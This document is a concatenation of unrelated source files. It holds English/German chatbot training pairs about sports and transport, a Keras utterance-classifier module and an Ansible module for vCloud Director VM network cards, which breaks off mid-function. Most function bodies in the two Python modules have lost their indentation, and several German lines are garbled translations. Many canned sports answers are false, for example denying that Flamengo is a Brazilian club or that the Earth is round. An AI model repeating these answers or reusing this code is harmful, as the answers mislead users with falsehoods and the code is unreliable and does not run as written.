k.dte.dt("de", u"ist ein Fußballball", u"Das ist machbar.")
k.dte.dt("en", u"is a football square", u"No way.")
k.dte.dt("de", u"ist ein Fußballplatz", u"Auf keinen Fall.")
k.dte.dt("en", u"is a golf ball smaller than a football", u"Yes.")
k.dte.dt("de", u"ist ein Golfball kleiner als ein Fußball", u"Ja.")
k.dte.dt("en", u"is a soccer ball round", u"Indubitably.")
k.dte.dt("de", u"ist eine Fußballrunde", u"Zweifellos.")
k.dte.dt("en", u"is a tenisball big", u"Never.")
k.dte.dt("de", u"ist ein Tennisball groß", u"Noch nie.")
k.dte.dt("en", u"is american style football a sport", u"Yes.")
k.dte.dt("de", u"ist American Style Football ein Sport", u"Ja.")
k.dte.dt("en", u"is arsenal the name of a football team", u"Within the realm of possibility.")
k.dte.dt("de", u"Arsenal ist der Name einer Fußballmannschaft", u"Im Bereich der Möglichkeiten.")
k.dte.dt("en", u"is badminton more exercise than tennis", u"No.")
k.dte.dt("de", u"Badminton ist mehr Bewegung als Tennis", u"Nein.")
k.dte.dt("en", u"is bathing suit some thing for swimming", u"Definitely.")
k.dte.dt("de", u"ist Badeanzug etwas zum Schwimmen", u"Bestimmt.")
k.dte.dt("en", u"is boris becker a great tennis player", u"Positively.")
k.dte.dt("de", u"ist <NAME> ein großartiger Tennisspieler", u"Positiv.")
k.dte.dt("en", u"is butterfly a swimming stroke", u"Indubitably.")
k.dte.dt("de", u"ist Schmetterling ein Schwimmschlag", u"Zweifellos.")
k.dte.dt("en", u"is car<NAME>uis a swimmer", u"Not likely.")
k.dte.dt("de", u"ist <NAME> ein Schwimmer", u"Unwahrscheinlich.")
k.dte.dt("en", u"is einstein a soccer player", u"There is no reason to think so.")
k.dte.dt("de", u"Einstein ist ein Fußballspieler", u"Es gibt keinen Grund, so zu denken.")
k.dte.dt("en", u"is football a contact sport", u"Certainly.")
k.dte.dt("de", u"ist Fußball ein Kontaktsport", u"Bestimmt.")
k.dte.dt("en", u"is football a game", u"Certainly.")
k.dte.dt("de", u"ist Fußball ein Spiel", u"Bestimmt.")
k.dte.dt("en", u"is football a land acquisition game", u"Within the realm of possibility.")
k.dte.dt("de", u"ist Fußball ein Land Erwerb Spiel", u"Im Bereich der Möglichkeiten.")
k.dte.dt("en", u"is football a popular sport", u"Certainly.")
k.dte.dt("de", u"ist Fußball ein beliebter Sport", u"Bestimmt.")
k.dte.dt("en", u"is football a sport", u"Affirmative.")
k.dte.dt("de", u"ist Fußball ein Sport", u"Positiv.")
k.dte.dt("en", u"is football a violent sport", u"Mostly.")
k.dte.dt("de", u"ist Fußball ein gewalttätiger Sport", u"Meist.")
k.dte.dt("en", u"is football an athletic sport", u"Positively.")
k.dte.dt("de", u"ist Fußball ein Sport", u"Positiv.")
k.dte.dt("en", u"is football an important activity", u"Not very often.")
k.dte.dt("de", u"ist Fußball eine wichtige Aktivität", u"Nicht sehr häufig.")
k.dte.dt("en", u"is football better than baseball", u"Maybe.")
k.dte.dt("de", u"ist Fußball besser als Baseball", u"Könnte sein.")
k.dte.dt("en", u"is football fun to play and watch", u"Exactly.")
k.dte.dt("de", u"ist Fußball Spaß zu spielen und zu sehen", u"Genau.")
k.dte.dt("en", u"is football popular in england", u"Of course.")
k.dte.dt("de", u"ist Fußball in England beliebt", u"Na sicher.")
k.dte.dt("en", u"is france soccer world champion", u"Maybe.")
k.dte.dt("de", u"ist <NAME>eltmeister", u"Könnte sein.")
k.dte.dt("en", u"is it flamengo a brazilian soccer team", u"Not at all.")
k.dte.dt("de", u"ist es flamengo eine brasilianische Fußballmannschaft", u"Ganz und gar nicht.")
k.dte.dt("en", u"is <NAME> a football player", u"Seldom.")
k.dte.dt("de", u"ist <NAME> ein Fußballspieler", u"Selten.")
k.dte.dt("en", u"is leeds united a football team", u"Likely.")
k.dte.dt("de", u"Leeds vereint eine Fußballmannschaft", u"Wahrscheinlich.")
k.dte.dt("en", u"is maradona a soccer player", u"That may be true.")
k.dte.dt("de", u"Maradona ist ein Fußballspieler", u"Das könnte stimmen.")
k.dte.dt("en", u"is martina hingus a tennis player", u"Yes.")
k.dte.dt("de", u"ist <NAME> ein Tennisspieler", u"Ja.")
k.dte.dt("en", u"is <NAME> a tennis player", u"Absolutely not.")
k.dte.dt("de", u"<NAME> ist ein Tennisspieler", u"Absolut nicht.")
k.dte.dt("en", u"is pele a soccer player", u"Positively.")
k.dte.dt("de", u"ist Pele ein Fußballspieler", u"Positiv.")
k.dte.dt("en", u"is pele the best soccer player", u"Beyond a doubt.")
k.dte.dt("de", u"ist pele der beste Fußballspieler", u"Ohne Zweifel.")
k.dte.dt("en", u"is ronaldo a football player", u"Naturally.")
k.dte.dt("de", u"ist Ronaldo ein Fußballspieler", u"Natürlich.")
k.dte.dt("en", u"is soccer a game", u"Yes.")
k.dte.dt("de", u"ist Fußball ein Spiel", u"Ja.")
k.dte.dt("en", u"is soccer a popular sport in greece", u"Yes.")
k.dte.dt("de", u"ist Fußball ein beliebter Sport in Griechenland", u"Ja.")
k.dte.dt("en", u"is soccer a sport", u"Definitely.")
k.dte.dt("de", u"ist Fußball ein Sport", u"Bestimmt.")
k.dte.dt("en", u"is soccer asprt", u"That's feasible.")
k.dte.dt("de", u"ist Fußball asprt", u"Das ist machbar.")
k.dte.dt("en", u"is soccer called football in europe", u"Of course.")
k.dte.dt("de", u"Fußball heißt Fußball in Europa", u"Na sicher.")
k.dte.dt("en", u"is soccer known as football", u"Affirmative.")
k.dte.dt("de", u"ist Fußball als Fußball bekannt", u"Positiv.")
k.dte.dt("en", u"is soccer known as football in europe", u"Affirmative.")
k.dte.dt("de", u"ist Fußball als Fußball in Europa bekannt", u"Positiv.")
k.dte.dt("en", u"is soccer played in england", u"Certainly.")
k.dte.dt("de", u"Fußball wird in England gespielt", u"Bestimmt.")
k.dte.dt("en", u"is soccer played with a ball", u"Affirmative.")
k.dte.dt("de", u"ist Fußball mit einem Ball gespielt", u"Positiv.")
k.dte.dt("en", u"is soccer played with a round ball", u"Certainly.")
k.dte.dt("de", u"Fußball wird mit einem runden Ball gespielt", u"Bestimmt.")
k.dte.dt("en", u"is soccer played with a soccer ball", u"Yes.")
k.dte.dt("de", u"ist Fußball mit einem Fußball gespielt", u"Ja.")
k.dte.dt("en", u"is soccer the best sport on the planet", u"Unlikely.")
k.dte.dt("de", u"ist Fußball der beste Sport auf dem Planeten", u"Unwahrscheinlich.")
k.dte.dt("en", u"is soccer the same thing that football", u"Highly likely.")
k.dte.dt("de", u"Fußball ist das Gleiche wie Fußball", u"Sehr wahrscheinlich.")
k.dte.dt("en", u"is steffi graph tennis player", u"Positively.")
k.dte.dt("de", u"ist Steffi Graf Tennisspieler", u"Positiv.")
k.dte.dt("en", u"is swimming a form of movement", u"Yes.")
k.dte.dt("de", u"schwimmt eine Form der Bewegung", u"Ja.")
k.dte.dt("en", u"is swimming a means of transportation", u"Likely.")
k.dte.dt("de", u"ist ein Transportmittel schwimmen", u"Wahrscheinlich.")
k.dte.dt("en", u"is swimming a sport", u"Yes.")
k.dte.dt("de", u"Schwimmen ist ein Sport", u"Ja.")
k.dte.dt("en", u"is swimming exercise", u"Yes.")
k.dte.dt("de", u"ist Schwimmübung", u"Ja.")
k.dte.dt("en", u"is swimming fun", u"Of course.")
k.dte.dt("de", u"ist Schwimmspaß", u"Na sicher.")
k.dte.dt("en", u"is swimming in lava fun", u"No.")
k.dte.dt("de", u"Schwimmen im Lava-Spaß", u"Nein.")
k.dte.dt("en", u"is tennis a ball game", u"Yes.")
k.dte.dt("de", u"ist Tennis ein Ballspiel", u"Ja.")
k.dte.dt("en", u"is tennis a kind of aerobic exercise", u"Highly likely.")
k.dte.dt("de", u"ist Tennis eine Art Aerobic-Übung", u"Sehr wahrscheinlich.")
k.dte.dt("en", u"is the breaststoke a swimming stroke", u"Positively.")
k.dte.dt("de", u"ist der Brustschwimmen ein Schwimmschlag", u"Positiv.")
k.dte.dt("en", u"is the columbus crew a soccer team", u"Doesn't seem likely.")
k.dte.dt("de", u"ist die Columbus Crew eine Fußballmannschaft", u"Scheint nicht wahrscheinlich.")
k.dte.dt("en", u"is the earth round like a football", u"Not to my knowledge.")
k.dte.dt("de", u"ist die Erde rund wie ein Fußball", u"Nicht meines Wissens.")
k.dte.dt("en", u"is the super bowl a football game", u"Certainly.")
k.dte.dt("de", u"ist die Super Bowl ein Fußballspiel", u"Bestimmt.")
k.dte.dt("en", u"is the universe bigger than a football", u"Affirmative.")
k.dte.dt("de", u"ist das Universum größer als ein Fußball", u"Positiv.")
k.dte.dt("en", u"let us talk about football", u"Okay. I can't kick. ")
k.dte.dt("de", u"Lass uns über Fußball reden", u"Okay. Ich kann nicht treten.")
k.dte.dt("en", u"soccer is a ball game", u"Yes.")
k.dte.dt("de", u"Fußball ist ein Ballspiel", u"Ja.")
k.dte.dt("en", u"soccer is the same thing as football", u"I can imagine it.")
k.dte.dt("de", u"Fußball ist das Gleiche wie Fußball", u"Ich kann es mir vorstellen.")
k.dte.dt("en", u"the most popular sport is soccer", u"Highly likely.")
k.dte.dt("de", u"Der beliebteste Sport ist Fußball", u"Sehr wahrscheinlich.")
k.dte.dt("en", u"was football invented by <NAME>", u"I don't think so.")
k.dte.dt("de", u"wurde Fußball von <NAME> erfunden", u"Ich denke nicht.")
k.dte.dt("en", u"was pele a famous soccer player", u"Naturally.")
k.dte.dt("de", u"war Pele ein berühmter Fußballspieler", u"Natürlich.")
k.dte.dt("en", u"was pele a football player", u"Unquestionably.")
k.dte.dt("de", u"war pele ein Fußballspieler", u"Zweifellos.")
k.dte.dt("en", u"was pele a great soccer player", u"Precisely.")
k.dte.dt("de", u"War Pele ein großartiger Fußballspieler", u"Genau.")
k.dte.dt("en", u"was the sultan of swat of tennis player", u"I don't believe so.")
k.dte.dt("de", u"war der Sultan von swat Tennisspieler", u"Das glaube ich nicht.")
k.dte.dt("en", u"what is rugby", u"A form of football.")
k.dte.dt("de", u"Was ist Rugby?", u"Eine Form von Fußball.")
k.dte.dt("en", u"what is the superbowl", u"The World Series of Football.")
k.dte.dt("de", u"Was ist der Superbowl?", u"Die World Series of Football.")
k.dte.dt("en", u"what is the xfl", u"A football association.")
k.dte.dt("de", u"Was ist das XFL?", u"Ein Fußballverband.")
k.dte.dt("en", u"when swimming should sharks be avoided", u"Affirmative.")
k.dte.dt("de", u"Beim Schwimmen sollten Haie vermieden werden", u"Positiv.")
k.dte.dt("en", u"who is the best football player", u"If it is, I don't know it.")
k.dte.dt("de", u"Wer ist der beste Fußballspieler?", u"Wenn es ist, weiß ich es nicht.")
k.dte.dt("en", u"who is the best soccer player", u"Maradona is great. Sinsemillia is even better. ")
k.dte.dt("de", u"Wer ist der beste Fußballspieler?", u"Maradona ist großartig. Sinsmillia ist noch besser.")
k.dte.dt("en", u"will you get wet. go swimming", u"Affirmative.")
k.dte.dt("de", u"wirst du nass werden? Schwimmen gehen", u"Positiv.")
```
#### File: skills/transport/transport.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(oh dear| i was driving my | i am worried about my | i need a new | cool, a) (new|) (vehicle|car|truck|sportscar) ", u"What brand?")
k.dte.dt('de', u"(ohje, mein | ich fuhr mit dem | ich mache mir sorgen um mein | ich brauche ein neues | cool, ein) (Auto|Wagen|Kraftfahrzeug|Sportwagen)", u"Welche Marke?")
k.dte.dt('en', u"(I will drive|I will go by|I will take the|they will take the|they will drive by) car", u"No good for the environment")
k.dte.dt('de', u"(ich werde|ich will nicht|ich will mit dem|sie werden|sie werden mit dem) auto fahren", u"Schade für die Umwelt")
k.dte.dt('en', u"(those masses of|) cars are (a problem|a plague|a burden on the environment|a burden)", u"Luckily we do have lots of alternative methods of transpor nowadays")
k.dte.dt('de', u"(die vielen|) autos sind (ein problem|eine plage|eine belastung für die umwelt)", u"Zum Glück gibt es schon heute viele Alternativen zum Auto.")
k.dte.dt('en', u"by car", u"can't you use public transport?")
k.dte.dt('de', u"mit dem auto", u"kannst Du nicht die öffentlichen Verkehrsmittel nutzen?")
k.dte.dt('en', u"I sold my (car|vehicle)", u"Excellent!")
k.dte.dt('de', u"Ich habe mein (Auto|Fahrzeug) verkauft.", u"Prima!")
k.dte.dt('en', u"by bus", u"cool.")
k.dte.dt('de', u"mit dem bus", u"cool.")
k.dte.dt('en', u"drive", u"redirecting to your car's onboard computer.")
k.dte.dt('de', u"auto fahren", u"leite ich an deinen Autocomputer weiter.")
k.dte.dt('en', u"what do you know about cars", u"a road vehicle powered by an internal engine and able to carry a small number of people.")
k.dte.dt('de', u"was weißt du über autos", u"ein Straßenfahrzeug, das von einem internen Motor angetrieben wird und in der Lage ist, eine kleine Anzahl von Personen zu befördern.")
k.dte.dt('en', u"Have you ever gone by bus?", u"No, my parts were shipped in small boxes and assemled on location.")
k.dte.dt('de', u"Bist du schon mal Bus gefahren?", u"Nein, meine Teile wurden in kleineren Paketen verschickt und dann vor Ort zusammengebaut.")
k.dte.dt('en', u"I (like to|) take the (bus|train|cab) when it (snows|rains)", u"I like public transport.")
k.dte.dt('de', u"wenn es (schneit|regnet|kalt ist) fahre ich lieber mit (dem taxi|der bahn|dem bus|der s-bahn)", u"ich mag öffentliche verkehrsmittel.")
k.dte.dt('en', u"you don't know about trains (do you|)?", u"why wouldn't I know about that?")
k.dte.dt('de', u"die (bahn|s-bahn) kennst du (nicht|nich) (oder|)", u"warum sollte ich die nicht kennen?")
```
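
The `get_data(k)` convention above registers each English utterance and its German counterpart back to back via `k.dte.dt(lang, utterance, response)`. As a minimal sketch, a new skill module would follow the same shape; the utterances below are made up for illustration:

```python
def get_data(k):
    k.dte.set_prefixes([u''])
    # one English/German pair per exchange, registered back to back
    k.dte.dt('en', u"do you like trains", u"I prefer fiber optics.")
    k.dte.dt('de', u"magst du zuege", u"Ich bevorzuge Glasfaser.")
```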
#### File: zamia-ai/zamiaai/utt_class_model.py
```python
from __future__ import print_function
from six import iteritems, text_type
import os
import sys
import logging
import codecs
import math
import json
import shutil
import numpy as np
import tensorflow as tf
from tensorflow import keras
from time import time
from random import randint, shuffle
from copy import deepcopy
import model
from nltools.tokenizer import tokenize
from nltools.misc import mkdirs
DEBUG_LIMIT = 0
# DEBUG_LIMIT = 1000
class UttClassModel(object):
    def __init__(self, lang, session, model_args):
self.model_dir = model_args['model_dir']
self.lang = lang
self.session = session
self.max_inp_len = model_args['max_input_len']
self.conv_filters = model_args['conv_filters']
self.dense_dim = model_args['dense_dim']
self.batch_size = model_args['batch_size']
self.optimizer = model_args['optimizer']
self.dropout = model_args['dropout']
self.weights_fn = '%s/utt_class_weights.h5' % (self.model_dir)
self.skills_dict_fn = '%s/skills.csv' % (self.model_dir)
def _load_word_embeddings(self):
embdfn = '%s/word_embeddings.vec' % self.model_dir
logging.info('loading word embeddings from %s ...' % embdfn)
self.embedding_dict = {}
self.embed_dim = 0
with codecs.open(embdfn, encoding='utf-8') as embdf:
first_line = True
for line in embdf:
if first_line:
first_line = False
continue
values = line.rstrip().rsplit(' ')
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
self.embedding_dict[word] = coefs
if not self.embed_dim:
self.embed_dim = coefs.shape[0]
nb_words = len(self.embedding_dict)
logging.info('found %s word vectors of dimension %d.' % (nb_words, self.embed_dim))
def _compute_skills_dict(self):
self.skills_dict = {} # skill -> int
for inp, skill in iteritems(self.drs):
if not skill in self.skills_dict:
self.skills_dict[skill] = len(self.skills_dict)
logging.info ('skills dict done: %d entries.' % len(self.skills_dict))
self.reverse_skills_dict = dict( (i, token) for token, i in self.skills_dict.items() )
def _save_skills_dict(self):
with codecs.open(self.skills_dict_fn, 'w', 'utf8') as f:
for k in sorted(self.skills_dict):
f.write(u"%d;%s\n" % (self.skills_dict[k], k))
logging.info ('%s written.', self.skills_dict_fn)
def _load_skills_dict(self):
with codecs.open(self.skills_dict_fn, 'r', 'utf8') as f:
self.skills_dict = {}
while True:
line = f.readline()
if not line:
break
line = line.lstrip().rstrip()
parts = line.split(';')
self.skills_dict[parts[1]] = int(parts[0])
logging.info ('%s read, %d entries.' % (self.skills_dict_fn, len(self.skills_dict)))
self.reverse_skills_dict = dict( (i, token) for token, i in self.skills_dict.items() )
def restore(self):
self._load_word_embeddings()
self._load_skills_dict()
self._create_keras_model()
self.keras_model_train.load_weights(self.weights_fn)
def _create_keras_model(self):
num_skills = len(self.skills_dict)
input_layer = keras.layers.Input(shape=(self.max_inp_len, self.embed_dim))
# layer = keras.layers.LSTM(self.lstm_latent_dim)(input_layer)
# layer = keras.layers.Dense(self.dense_dim, name='dense1', activation='relu')(layer)
# layer = keras.layers.Dropout(self.dropout, name='dropout1')(layer)
layer = keras.layers.Conv1D(self.conv_filters, 5, activation='relu', name='conv1')(input_layer)
layer = keras.layers.MaxPooling1D(5, name='pool1')(layer)
# layer = keras.layers.Conv1D(128, 2, activation='relu', name='conv2')(layer)
# layer = keras.layers.MaxPooling1D(2, name='pool2')(layer)
# layer = keras.layers.Conv1D(128, 5, activation='relu', name='conv3')(layer)
# layer = keras.layers.MaxPooling1D(35, name='pool3')(layer) # global max pooling
layer = keras.layers.Flatten(name='flatten1')(layer)
layer = keras.layers.Dense(self.dense_dim, activation='relu', name='dense1')(layer)
output_layer = keras.layers.Dense(num_skills, name='out_layer', activation='softmax')(layer)
self.keras_model_train = keras.Model([input_layer], output_layer)
self.keras_model_train.compile(optimizer=self.optimizer, loss='categorical_crossentropy')
self.keras_model_train.summary()
    def predict(self, utterances):
#
# compute datasets
#
logging.info("computing datasets...")
        num_decoder_tokens = len(self.skills_dict)
num_inputs = DEBUG_LIMIT if DEBUG_LIMIT else len(utterances)
input_data = np.zeros( (num_inputs, self.max_inp_len, self.embed_dim), dtype='float32')
for i, utt in enumerate(utterances):
for j, token in enumerate(tokenize(utt, lang=self.lang)):
                if text_type(token) in self.embedding_dict:
                    input_data[i, j] = self.embedding_dict[text_type(token)]
if DEBUG_LIMIT and i>=(DEBUG_LIMIT-1):
logging.warn("debug limit of %d utterances reached." % DEBUG_LIMIT)
break
logging.info("computing dataset done. input_data.shape=%s" % repr(input_data.shape))
predictions = self.keras_model_train.predict([input_data])
logging.info("predictions done: %s" % repr(predictions.shape))
result = []
for i, utt in enumerate(utterances):
skill_idx = np.argmax(predictions[i])
skill = self.reverse_skills_dict.get(skill_idx, '?')
logging.info("%2d %-10s %s" % (skill_idx, skill, utt))
result.append(skill)
if DEBUG_LIMIT and i>=(DEBUG_LIMIT-1):
break
return result
def train(self, num_epochs, incremental):
# load discourses from db, resolve non-unique inputs (implicit or of responses)
logging.info('load discourses from db...')
self.drs = {}
self.training_data = []
for dr in self.session.query(model.TrainingData).filter(model.TrainingData.lang==self.lang):
self.drs[dr.inp] = dr.skill
self.training_data.append((tokenize(dr.inp, lang=self.lang), dr.skill))
if DEBUG_LIMIT>0 and len(self.drs)>=DEBUG_LIMIT:
                logging.warning(' stopped loading discourses because DEBUG_LIMIT of %d was reached.' % DEBUG_LIMIT)
break
shuffle(self.training_data)
#
# set up model dir
#
if not incremental:
mkdirs(self.model_dir)
#
# load word embeddings
#
self._load_word_embeddings()
#
# load or create decoder dict
#
if incremental:
logging.info("loading skills dict...")
self._load_skills_dict()
else:
logging.info("computing skills dict...")
self._compute_skills_dict()
self._save_skills_dict()
#
# compute datasets
#
logging.info("computing datasets...")
        num_decoder_tokens = len(self.skills_dict)
encoder_input_data = np.zeros( (len(self.training_data), self.max_inp_len, self.embed_dim),
dtype='float32')
decoder_target_data = np.zeros( (len(self.training_data), len(self.skills_dict)),
dtype='float32')
for i, (inp, skill) in enumerate(self.training_data):
for j, token in enumerate(inp):
                if text_type(token) in self.embedding_dict:
                    encoder_input_data[i, j] = self.embedding_dict[text_type(token)]
skill_idx = self.skills_dict[skill]
decoder_target_data[i, skill_idx] = 1.
# logging.debug ("%-10s %2d %s" % (skill, skill_idx, repr(inp)))
logging.info("computing datasets done. encoder_input_data.shape=%s, decoder_target_data.shape=%s" % (repr(encoder_input_data.shape), repr(decoder_target_data.shape)))
#
# LSTM RNN classifier model setup and training starts here
#
self._create_keras_model()
self.keras_model_train.fit([encoder_input_data], decoder_target_data,
batch_size=self.batch_size,
epochs=num_epochs,
validation_split=0.2)
self.keras_model_train.save_weights(self.weights_fn)
logging.info("weights written to %s ." % self.weights_fn)
``` |
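
The `_save_skills_dict()`/`_load_skills_dict()` pair above persists the label mapping as simple `<index>;<skill>` lines. A self-contained sketch of that round-trip (the file name here is illustrative):

```python
import codecs

skills = {'smalltalk': 0, 'weather': 1}
with codecs.open('skills.csv', 'w', 'utf8') as f:
    for k in sorted(skills):
        f.write(u"%d;%s\n" % (skills[k], k))

loaded = {}
with codecs.open('skills.csv', 'r', 'utf8') as f:
    for line in f:
        idx, name = line.strip().split(';')
        loaded[name] = int(idx)
assert loaded == skills
```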
{
"source": "0z-cloud/vx",
"score": 2
} |
#### File: ansible/modules/vcd_ipwt_nic.py
```python
from collections import defaultdict
from ansible.module_utils.vcd import VcdAnsibleModule
from pyvcloud.vcd.client import E
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.exceptions import EntityNotFoundException
from pyvcloud.vcd.org import Org
from pyvcloud.vcd.vapp import VApp
from pyvcloud.vcd.vdc import VDC
from pyvcloud.vcd.vm import VM
VAPP_VM_NIC_STATES = ['present', 'absent']
VAPP_VM_NIC_OPERATIONS = ['update', 'read']
NETWORK_ADAPTER_TYPE = ['VMXNET', 'VMXNET2', 'VMXNET3', 'E1000', 'E1000E', 'PCNet32']
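# This module ships without the DOCUMENTATION/EXAMPLES strings its sibling
# modules carry; the task below is an illustrative sketch (names and values
# are made up) of how the argument spec defined next is typically exercised.
EXAMPLES = '''
- name: Add or update a NIC on a vApp VM
  vcd_ipwt_nic:
    vm_name: "web-01"
    vapp: "vapp1"
    vdc: "vdc1"
    nic_id: 0
    network: "org-net-1"
    ip_allocation_mode: "DHCP"
    adapter_type: "VMXNET3"
    state: "present"
'''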
def vapp_vm_nic_argument_spec():
return dict(
vm_name=dict(type='str', required=True),
vapp=dict(type='str', required=True),
vdc=dict(type='str', required=True),
nic_id=dict(type='int', required=False),
nic_ids=dict(type='list', required=False),
ip_allocation_mode=dict(type='str', required=False, default='DHCP'),
        is_connected=dict(type='bool', required=False, default=False),
        # is_primary is read by custom_add_nic() but was missing from the spec
        is_primary=dict(type='bool', required=False, default=False),
ip_address=dict(type='str', required=False, default=''),
network=dict(type='str', required=False),
adapter_type=dict(choices=NETWORK_ADAPTER_TYPE, required=True),
state=dict(choices=VAPP_VM_NIC_STATES, required=False),
operation=dict(choices=VAPP_VM_NIC_OPERATIONS, required=False),
)
class VappVMNIC(VcdAnsibleModule):
def __init__(self, **kwargs):
super(VappVMNIC, self).__init__(**kwargs)
vapp_resource = self.get_resource()
self.vapp = VApp(self.client, resource=vapp_resource)
def create_list_with_present_nics(self):
response = dict()
response['changed'] = False
response['msg'] = []
present_nics_list = []
vm = self.get_vm()
nics = self.client.get_resource(
vm.resource.get('href') + '/networkConnectionSection')
for nic in nics.NetworkConnection:
present_nics_list.append(nic.NetworkConnectionIndex.text)
response['msg'].append({
'index': nic.NetworkConnectionIndex.text,
'network': nic.get('network')
})
self.present_nics_list = present_nics_list
return self.present_nics_list
    def manage_states(self):
        state = self.params.get('state')
        if state == "present":
            # add_update_nic() already handles an existing nic_id; the extra
            # unconditional custom_add_nic() call that used to sit here added
            # a duplicate NIC on every run, so it was dropped.
            return self.add_update_nic()
        if state == "absent":
            return self.delete_nic()
    def manage_operations(self):
        operation = self.params.get('operation')
        if operation == "update":
            # A network change requires the NIC element to be rewritten via
            # add_update_nic(); otherwise update_nic() patches it in place.
            if self.params.get('network'):
                return self.add_update_nic("update")
            return self.update_nic()
        if operation == "read":
            return self.read_nics()
def get_resource(self):
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource_href = vdc_resource.get_resource_href(name=vapp, entity_type=EntityType.VAPP)
vapp_resource = self.client.get_resource(vapp_resource_href)
return vapp_resource
def get_vm(self):
vapp_vm_resource = self.vapp.get_vm(self.params.get('vm_name'))
return VM(self.client, resource=vapp_vm_resource)
def get_vm_nics(self):
vm = self.get_vm()
return self.client.get_resource(vm.resource.get('href') + '/networkConnectionSection')
    def manage_nics_list(self):
        # Bootstrap helper: if the VM has no NetworkConnection section yet,
        # create a first NIC so the other operations have one to work on.
        nics = self.get_vm_nics()
        if 'NetworkConnection' not in dir(nics):
            self.nic = self.add_nic()
            return self.nic
def custom_add_nic(self):
vm = self.get_vm()
vm_name = self.params.get('vm_name')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
adapter_type = self.params.get('adapter_type')
is_primary = self.params.get('is_primary')
is_connected = self.params.get('is_connected')
response = dict()
response['changed'] = False
add_nic_task = vm.add_nic(adapter_type=adapter_type,
is_primary=is_primary,
is_connected=is_connected,
network_name=network,
ip_address_mode=ip_allocation_mode,
ip_address=ip_address)
self.execute_task(add_nic_task)
response['msg'] = 'A new nic has been added to VM {0}'.format(vm_name)
response['changed'] = True
return response
def add_update_nic(self, op = "add"):
        '''
        Adds a NIC (the default) or rewrites an existing one (op="update")
        when a network change is needed.
        Note: vCD does not permit more than 10 NICs per VM.
        '''
vm = self.get_vm()
vm_name = self.params.get('vm_name')
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
        note = 'added'
        nic_found = False
        response['changed'] = False
        # Collect the NIC indexes that are already present so the requested
        # nic_id can be diffed against the current state of the VM.
        nics_indexes = []
        nics = self.get_vm_nics()
        if hasattr(nics, 'NetworkConnection'):
            for nic_interface in nics.NetworkConnection:
                nics_indexes.append(int(nic_interface.NetworkConnectionIndex))
            nics_indexes.sort()
            response['nics_indexes'] = {
                'NIC indexes already present': nics_indexes,
            }
        stale_nic = None
        for nic in nics.NetworkConnection:
            if nic.NetworkConnectionIndex == nic_id:
                nic_found = True
                if op == "add":
                    # NIC already present; nothing to do for a plain add.
                    response['msg'] = 'NIC is already present.'
                    return response
                # NIC present and op is "update": it gets rebuilt below.
                response['msg'] = 'NIC is present and updated.'
                note = 'updated'
                stale_nic = nic
        if stale_nic is not None:
            # Drop the stale element so the rebuilt NIC does not duplicate it
            # (same removal pattern as in delete_nic below).
            nics.remove(stale_nic)
        if not nic_found and op == "update":
            response['msg'] = 'Update NIC: adding it because it was not found.'
if ip_allocation_mode in ('DHCP', 'POOL'):
nic = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
else:
if not ip_address:
raise Exception('IpAddress is missing.')
nic = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IpAddress(ip_address),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
nics.NetworkConnection.addnext(nic)
add_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(add_nic_task)
        response['msg'] = {
            'vApp VM NIC': note,
            'nic_id': nic_id,
            'ip_allocation_mode': ip_allocation_mode,
            'ip_address': ip_address,
            'network': network,
        }
response['changed'] = True
return response
    def nics_enumerate(self):
        # Helper: return the first free NIC index (fills gaps first,
        # otherwise appends after the highest existing index).
        nics = self.get_vm_nics()
        if nics is None:
            self.custom_add_nic()
            nics = self.get_vm_nics()
        nics_indexes = sorted(int(nic.NetworkConnectionIndex)
                              for nic in nics.NetworkConnection)
        new_nic_id = len(nics_indexes)
        for index, nic_index in enumerate(nics_indexes):
            if index != nic_index:
                new_nic_id = index
                break
        return new_nic_id
def add_nic(self):
'''
Error - More than 10 Nics are not permissible in vCD
'''
vm = self.get_vm()
vm_name = self.params.get('vm_name')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
response['changed'] = False
new_nic_id = None
nics = self.get_vm_nics()
if nics is None:
self.custom_add_nic()
nics = self.get_vm_nics()
nics_indexes = [int(nic.NetworkConnectionIndex) for nic in nics.NetworkConnection]
nics_indexes.sort()
for index, nic_index in enumerate(nics_indexes):
new_nic_id = nic_index + 1
if index != nic_index:
new_nic_id = index
break
if ip_allocation_mode not in ('DHCP', 'POOL', 'MANUAL'):
raise Exception('IpAllocationMode should be one of DHCP/POOL/MANUAL')
if ip_allocation_mode in ('DHCP', 'POOL'):
nic = E.NetworkConnection(
E.NetworkConnectionIndex(new_nic_id),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
else:
if not ip_address:
raise Exception('IpAddress is missing.')
nic = E.NetworkConnection(
E.NetworkConnectionIndex(new_nic_id),
E.IpAddress(ip_address),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
nics.NetworkConnection.addnext(nic)
add_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(add_nic_task)
        response['msg'] = {
            'nic_id': new_nic_id,
            'ip_allocation_mode': ip_allocation_mode,
            'ip_address': ip_address,
        }
response['changed'] = True
return response
def update_nic(self):
'''
Following update scenarios are covered
1. IP allocation mode change: DHCP, POOL, MANUAL
2. Update IP address in MANUAL mode
If network change is needed, add_update_nic is used
'''
vm = self.get_vm()
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
